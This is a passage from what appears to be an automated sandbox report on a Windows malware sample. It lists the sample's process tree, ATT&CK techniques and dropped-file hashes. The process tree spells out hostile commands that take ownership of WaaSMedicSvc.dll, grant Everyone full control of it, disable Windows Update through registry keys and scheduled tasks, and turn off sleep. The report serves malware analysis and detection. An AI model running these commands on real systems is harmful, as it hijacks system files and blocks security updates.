          - C:\Windows\system32\takeown.exe (PID 2144): takeown /f C:\Windows\System32\WaaSMedicSvc.dll [Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken]
          - C:\Windows\system32\icacls.exe (PID 2908): icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q [Possible privilege escalation attempt; Modifies file permissions]
          - C:\Windows\system32\reg.exe (PID 1520): reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f [Modifies registry key]
          - C:\Windows\system32\reg.exe (PID 2224): reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f [Modifies registry key]
          - C:\Windows\system32\reg.exe (PID 2568): reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f [Modifies registry key]
          - C:\Windows\system32\reg.exe (PID 1668): reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f [Modifies registry key]
          - C:\Windows\system32\schtasks.exe (PID 2056): SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
          - C:\Windows\system32\schtasks.exe (PID 2716): SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
          - C:\Windows\system32\schtasks.exe (PID 2980): SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
          - C:\Windows\system32\schtasks.exe (PID 2040): SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
          - C:\Windows\system32\schtasks.exe (PID 1996): SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
          - C:\Windows\system32\schtasks.exe (PID 1812): SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
          - C:\Windows\system32\schtasks.exe (PID 1060): SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        - C:\Windows\System32\cmd.exe (PID 2732): "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
          - C:\Windows\system32\powercfg.exe (PID 2832): powercfg /x -hibernate-timeout-ac 0 [Suspicious use of AdjustPrivilegeToken]
          - C:\Windows\system32\powercfg.exe (PID 2240): powercfg /x -hibernate-timeout-dc 0 [Suspicious use of AdjustPrivilegeToken]
          - C:\Windows\system32\powercfg.exe (PID 1532): powercfg /x -standby-timeout-ac 0 [Suspicious use of AdjustPrivilegeToken]
          - C:\Windows\system32\powercfg.exe (PID 1768): powercfg /x -standby-timeout-dc 0 [Suspicious use of AdjustPrivilegeToken]
Network
MITRE ATT&CK Enterprise v15
- Persistence
  - Create or Modify System Process: 2
    - Windows Service: 2
  - Scheduled Task/Job: 1
- Privilege Escalation
  - Create or Modify System Process: 2
    - Windows Service: 2
  - Scheduled Task/Job: 1
Downloads
-
Filesize
293KB
MD57a2d5deab61f043394a510f4e2c0866f
SHA1ca16110c9cf6522cd7bea32895fd0f697442849b
SHA25675db945388f62f2de3d3eaae911f49495f289244e2fec9b25455c2d686989f69
SHA512b66b0bf227762348a5ede3c2578d5bc089c222f632a705241bcc63d56620bef238c67ca2bd400ba7874b2bc168e279673b0e105b73282bc69aa21a7fd34bafe0
-
Filesize
293KB
MD57a2d5deab61f043394a510f4e2c0866f
SHA1ca16110c9cf6522cd7bea32895fd0f697442849b
SHA25675db945388f62f2de3d3eaae911f49495f289244e2fec9b25455c2d686989f69
SHA512b66b0bf227762348a5ede3c2578d5bc089c222f632a705241bcc63d56620bef238c67ca2bd400ba7874b2bc168e279673b0e105b73282bc69aa21a7fd34bafe0
-
Filesize
448KB
MD56d1c62ec1c2ef722f49b2d8dd4a4df16
SHA11bb08a979b7987bc7736a8cfa4779383cb0ecfa6
SHA25600da1597d92235d3f84da979e2fa5dbf049bafb52c33bd6fc8ee7b29570c124c
SHA512c0dce8eaa52eb6c319d4be2eec4622bb3380c65b659cfb77ff51a4ada7d3e591e791ee823dad67b5556ffac5c060ff45d09dd1cc21baaf70ba89806647cb3bd2
-
Filesize
448KB
MD56d1c62ec1c2ef722f49b2d8dd4a4df16
SHA11bb08a979b7987bc7736a8cfa4779383cb0ecfa6
SHA25600da1597d92235d3f84da979e2fa5dbf049bafb52c33bd6fc8ee7b29570c124c
SHA512c0dce8eaa52eb6c319d4be2eec4622bb3380c65b659cfb77ff51a4ada7d3e591e791ee823dad67b5556ffac5c060ff45d09dd1cc21baaf70ba89806647cb3bd2
-
Filesize
4.1MB
MD5
50bfdd2eb713e8b5ef0899848159542e
SHA1
df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA256
1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512
d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc
-
Filesize
4.1MB
MD5
50bfdd2eb713e8b5ef0899848159542e
SHA1
df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA256
1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512
d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc
-
Filesize
4.1MB
MD5
50bfdd2eb713e8b5ef0899848159542e
SHA1
df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA256
1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512
d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc
-
Filesize
4.1MB
MD5
50bfdd2eb713e8b5ef0899848159542e
SHA1
df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA256
1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512
d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc
-
Filesize
310KB
MD5
7b8fcb29905e045b7f8c1dc9bc305698
SHA1
1f8f2b29447f871b7b76f6bfb299d1f8c56f2fc8
SHA256
70eca85476c7ddb1f416bdc2678bafb5998d80f5d8da27a4339971b6f0693173
SHA512
d4f4c491bf4ea187f4a41c4b091935dde4c65300494c8d9dd3a242a03e92191b6789f17ffdaf06dbfb967988c2ba2671687b7a14c23682fc3972165df726a0b2
-
Filesize
310KB
MD5
7b8fcb29905e045b7f8c1dc9bc305698
SHA1
1f8f2b29447f871b7b76f6bfb299d1f8c56f2fc8
SHA256
70eca85476c7ddb1f416bdc2678bafb5998d80f5d8da27a4339971b6f0693173
SHA512
d4f4c491bf4ea187f4a41c4b091935dde4c65300494c8d9dd3a242a03e92191b6789f17ffdaf06dbfb967988c2ba2671687b7a14c23682fc3972165df726a0b2
-
Filesize
4.1MB
MD5
50bfdd2eb713e8b5ef0899848159542e
SHA1
df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA256
1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512
d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc
-
Filesize
4.1MB
MD5
50bfdd2eb713e8b5ef0899848159542e
SHA1
df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA256
1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512
d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc
-
Filesize
244B
MD5
e87b986da2d91d9cc2203e6f12bdb13d
SHA1
729e54e08a5cc0784f4d90220a8a1298a6410145
SHA256
44eeec4e1ef502fe97433d8588b09fc2e05d65079a3d1f3e071cbd1ae645cf56
SHA512
6c5bf1a7c2290a0890534697ad41de4b5ee2821047c328fe279ef580a986ad67821493a15c0f18b6c012e852f34f4f42717c9181bffa12d8328100c90ccfac79
-
Filesize
14KB
MD5
0c0195c48b6b8582fa6f6373032118da
SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\07CGK9RARWSQRHXDB2S5.temp
Filesize
7KB
MD5
d0bf3f094fc677a52e2f7f063edf2c85
SHA1
df3b4123b6e90b681c3cf0f30ef496ce86787aac
SHA256
47c3f6279033c90aa787c60c9e15792b57710a9c19811074a8106fc232bbdea4
SHA512
a32d72a3bcd9a9047bcc00aee153659e893d14759468afb437258ea2e8e22c7a1b0da7e7d386e289cd3f11992bd21acc636826d1b6106962f1e1e3ba170ada7d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB
MD5
d0bf3f094fc677a52e2f7f063edf2c85
SHA1
df3b4123b6e90b681c3cf0f30ef496ce86787aac
SHA256
47c3f6279033c90aa787c60c9e15792b57710a9c19811074a8106fc232bbdea4
SHA512
a32d72a3bcd9a9047bcc00aee153659e893d14759468afb437258ea2e8e22c7a1b0da7e7d386e289cd3f11992bd21acc636826d1b6106962f1e1e3ba170ada7d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB
MD5
34dc4454196f0ad68db18c132e5e281c
SHA1
b0ce0637ccbe63c97177fa298098deb9a1207d91
SHA256
8ef8c0b7fcfe8ec307019ea0de462a7004de826415a941f9124fabed3a1a8995
SHA512
65cc1698795f46c1bdf3d70110932159e37ed363514b82b137b4ef0022f84fb7566f1c88014d61982f2b4a7cae4ae35fa8a8ac12fb4dcd3b28ef8f60709a27a8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB
MD5
d0bf3f094fc677a52e2f7f063edf2c85
SHA1
df3b4123b6e90b681c3cf0f30ef496ce86787aac
SHA256
47c3f6279033c90aa787c60c9e15792b57710a9c19811074a8106fc232bbdea4
SHA512
a32d72a3bcd9a9047bcc00aee153659e893d14759468afb437258ea2e8e22c7a1b0da7e7d386e289cd3f11992bd21acc636826d1b6106962f1e1e3ba170ada7d
-
Filesize
4.1MB
MD5
50bfdd2eb713e8b5ef0899848159542e
SHA1
df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA256
1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512
d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc
-
Filesize
4.1MB
MD5
50bfdd2eb713e8b5ef0899848159542e
SHA1
df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA256
1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512
d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc
-
Filesize
310KB
MD5
7b8fcb29905e045b7f8c1dc9bc305698
SHA1
1f8f2b29447f871b7b76f6bfb299d1f8c56f2fc8
SHA256
70eca85476c7ddb1f416bdc2678bafb5998d80f5d8da27a4339971b6f0693173
SHA512
d4f4c491bf4ea187f4a41c4b091935dde4c65300494c8d9dd3a242a03e92191b6789f17ffdaf06dbfb967988c2ba2671687b7a14c23682fc3972165df726a0b2
-
Filesize
4.1MB
MD5
50bfdd2eb713e8b5ef0899848159542e
SHA1
df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA256
1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512
d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc